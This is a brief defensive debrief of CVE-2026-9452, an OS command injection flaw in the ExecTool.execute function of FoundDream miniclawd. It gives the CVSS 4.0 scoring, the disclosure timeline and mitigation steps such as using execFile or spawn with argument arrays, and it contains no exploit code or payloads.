CVE-2026-9452 FoundDream CVE debrief

Who should care

Organizations running FoundDream miniclawd deployments, particularly those exposing the tool to untrusted input or network-accessible interfaces. Security teams monitoring for command injection vulnerabilities in TypeScript/Node.js applications.

Technical summary

The ExecTool.execute function in /src/tools/exec.ts fails to properly sanitize user-controlled input before passing it to operating system command execution functions. This allows attackers to inject arbitrary shell commands through crafted input. The vulnerability is remotely exploitable without authentication. The CVSS 4.0 score of 5.5 (MEDIUM) reflects network accessibility with low attack complexity, though impact is limited to low confidentiality, integrity, and availability effects. The exploit has been publicly disclosed, increasing the risk of active exploitation.

Defensive priority

medium

Recommended defensive actions

• Review and sanitize all user input passed to ExecTool.execute in /src/tools/exec.ts
• Implement input validation and parameterized command execution to prevent OS command injection
• Consider using execFile or spawn with argument arrays instead of shell execution
• Monitor for unexpected process spawning or shell activity from miniclawd deployments
• Subscribe to the GitHub repository for security updates and patch availability

Evidence notes

Vulnerability disclosed via VulDB with public GitHub issue report. CVE published 2026-05-25, modified 2026-05-26. CVSS 4.0 vector indicates network attack vector with low complexity, no privileges required, and no user interaction. CWE-77 and CWE-78 identified as primary weakness types.

Official resources